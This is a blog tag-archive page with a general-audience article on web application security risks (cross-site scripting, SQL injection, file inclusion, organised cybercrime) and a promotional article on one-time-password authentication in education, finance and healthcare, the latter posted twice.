Tag Archives: confidential
How could Web application (in)security affect me?
Nearly 55 percent of all vulnerability disclosures in 2008 affected web applications.
Web applications have become the major hunting grounds for cyber criminals who quite rightly view them as low hanging fruit. Just as building new motorways improves access for traditional burglars and car thieves, web applications internet accessibility literally delivers them to the hackers doors.
For some time now, cyber crime has simply been another arm of organised crime. And organised crime is pouring a substantial portion of its vast resources into cyber crime … because the return on investment is very high.
Organised crime goes to great lengths to get its hands on any information and the more confidential it is, the better. Once theyve hacked into an application, they can either make use of it themselves or sell it on to others. They can also take control of the various resources such as servers and databases that house that information and turn a profit from that as well.
Having gained control of your computing power by exploiting vulnerabilities and adding code to your application, they add your power to their existing haul and create botnets a global network of robots reporting to their master command-and-control node which can be directed to attack other organisations, or sold to other criminals who, once they hold enough power, can orchestrate denial of service attacks.
No longer is it enough for these criminals to boast of their hacking prowess; these days its all about the money. Given that a properly engineered denial of service attack is powerful enough to bring down pretty much any global multi-national corporation or, in fact, any small country and take them off-line for the duration, this is not about bragging rights, its extortion. It is money-motivated from start to finish.
Because all information and all computing power is grist to the mill for the criminals, no company is too small and certainly no company is too big to be targeted. And as the security in large enterprises is often no better than small entities, size is truly no barrier to the criminals.
And no business can afford the consequences of a security breach. At the very least, mismanaging confidential information almost always leads to reputational damage. Reputational damage leads to departure of existing clients as well as difficulty attracting new business a situation that can go on for many years. There are obvious bottom line implications to those consequences; in the most extreme cases, businesses can go under.
According to IBMs X-Force 2009 Mid-Year Trend and Risk Report, the predominant risks to web applications are from cross-site scripting, SQL injection and file include vulnerabilities.
Cross-site scripting vulnerabilities occur when web applications do not properly validate user input, thus allowing criminals to embed their own script into a page the user is visiting. This script can steal confidential information or exploit existing vulnerabilities in the users web browser. Cross-site scripting vulnerabilities are typically exploited in phishing attacks by sending users a malicious link to a page in a legitimate domain name via email. The criminals get high returns because users trust the familiar domain name they are visiting and thus trust the links (created by the criminals) therein.
SQL injection vulnerabilities are also about improperly validated user input, but in this case that input includes SQL statements that are executed by a database, giving attackers access to that database to read, delete and modify sensitive information (like credit card data) as well as embedding code into the database allowing attacks against other visitors to the web site.
File-include vulnerabilities occur when the application is forced to execute code from a non-validated remote source, allowing criminals to take over the web application remotely. This category includes some denial-of-service attacks as well as techniques that allow criminals direct access to files, directories, user information and other components of the web application.
Facilitating all these kinds of attacks is the fact that many web sites contain some code to support various features and functions which inadvertently introduces vulnerabilities.
Russian roulette, anyone?
Could A One Time Password Already Be Securing Your Industry?
Technology affects every aspect of our life, especially our security. Luckily there is always new technology being created to help keep our lives more secure. As our lives become digitized it seems that more and more sensitive information is being added to databases connected to networks or accessible from the web. This raises a red flag to anyone who has been affected by identity theft or fraud. With all of our personal data being stored in so many places it would seem that we more vulnerable to malicious attacks than ever. However this is not true, as technology begins to change the way we interact and share information it is also changing the way we secure our data.
Two- factor authentication utilizing a one-time password is technology that has been around for decades although the need for such security has risen lately. With many industries going paperless and wireless it opens the gate for hackers to siphon private data. Industries such as education, financial services and healthcare are all in need of higher security since they deal with important information that must be kept confidential.
OTP in Education
The education industry has been utilizing electronic records for a long time to manage students. These records are stored on a computer that is connected to a network for administrative use, the very same network that students are accessing from their laptops, tablets and smartphones.
Even on a password secured network these records are vulnerable since you do not need to be extremely computer savvy to use a key logger. Any student could simple attach a device to their teachers computer or install malicious software that operates discreetly behind the scenes to log keystrokes. Potentially stealing their teachers login credentials and gaining access to confidential information.
Any agency collecting, maintaining and storing sensitive information is responsible for managing that data responsibly as stated in “The Family Educational Rights and Privacy Act” also known as FERPA. With security being their government appointed responsibility and malicious attacks becoming easier to perform, many education agencies are securing their confidential information with two-factor authentication through a one-time password.
OTP for Financial Services
Identity fraud is most apparent in the financial services industry for a good reason, it deals directly with money. Just like everything technology has affected the way we bank with online banking being offered by almost every bank. However this poses a threat to client identities. To keep account holders secure a one-time password is used to keep online banking customers safe by authenticating a user when they log in from different IP addresses. Two-factor authentication is also used to identify an account holder at almost every point of transaction through a bank card and PIN.
OTP in Healthcare
The healthcare industry is facing many changes in the future from regulations demanding increased security of patients confidential information. With more sensitive data being readily available over the internet for physicians the need to secure that information is extremely critical. Authorization to access a patients medical record is crucial and a one-time password provides that security by identifying the physician, issuing the OTP and allowing a single sign on. Even on mobile devices such as laptops and tablets, zero footprint security can allow access to records without leaving any data on the device.
Transmitting data securely is the future of security in almost every industry. Info is power and with almost every industry moving over to wireless interaction between tablets, laptops and smartphones hackers are using technology against us to gain power. Securing that information through two-factor authentication and one-time password services is the future of technology in order to protect the same users it was put in place to help.
Could A One Time Password Already Be Securing Your Industry?
Technology affects every aspect of our life, especially our security. Luckily there is always new technology being created to help keep our lives more secure. As our lives become digitized it seems that more and more sensitive information is being added to databases connected to networks or accessible from the web. This raises a red flag to anyone who has been affected by identity theft or fraud. With all of our personal data being stored in so many places it would seem that we more vulnerable to malicious attacks than ever. However this is not true, as technology begins to change the way we interact and share information it is also changing the way we secure our data.
Two- factor authentication utilizing a one-time password is technology that has been around for decades although the need for such security has risen lately. With many industries going paperless and wireless it opens the gate for hackers to siphon private data. Industries such as education, financial services and healthcare are all in need of higher security since they deal with important information that must be kept confidential.
OTP in Education
The education industry has been utilizing electronic records for a long time to manage students. These records are stored on a computer that is connected to a network for administrative use, the very same network that students are accessing from their laptops, tablets and smartphones.
Even on a password secured network these records are vulnerable since you do not need to be extremely computer savvy to use a key logger. Any student could simple attach a device to their teachers computer or install malicious software that operates discreetly behind the scenes to log keystrokes. Potentially stealing their teachers login credentials and gaining access to confidential information.
Any agency collecting, maintaining and storing sensitive information is responsible for managing that data responsibly as stated in “The Family Educational Rights and Privacy Act” also known as FERPA. With security being their government appointed responsibility and malicious attacks becoming easier to perform, many education agencies are securing their confidential information with two-factor authentication through a one-time password.
OTP for Financial Services
Identity fraud is most apparent in the financial services industry for a good reason, it deals directly with money. Just like everything technology has affected the way we bank with online banking being offered by almost every bank. However this poses a threat to client identities. To keep account holders secure a one-time password is used to keep online banking customers safe by authenticating a user when they log in from different IP addresses. Two-factor authentication is also used to identify an account holder at almost every point of transaction through a bank card and PIN.
OTP in Healthcare
The healthcare industry is facing many changes in the future from regulations demanding increased security of patients confidential information. With more sensitive data being readily available over the internet for physicians the need to secure that information is extremely critical. Authorization to access a patients medical record is crucial and a one-time password provides that security by identifying the physician, issuing the OTP and allowing a single sign on. Even on mobile devices such as laptops and tablets, zero footprint security can allow access to records without leaving any data on the device.
Transmitting data securely is the future of security in almost every industry. Info is power and with almost every industry moving over to wireless interaction between tablets, laptops and smartphones hackers are using technology against us to gain power. Securing that information through two-factor authentication and one-time password services is the future of technology in order to protect the same users it was put in place to help.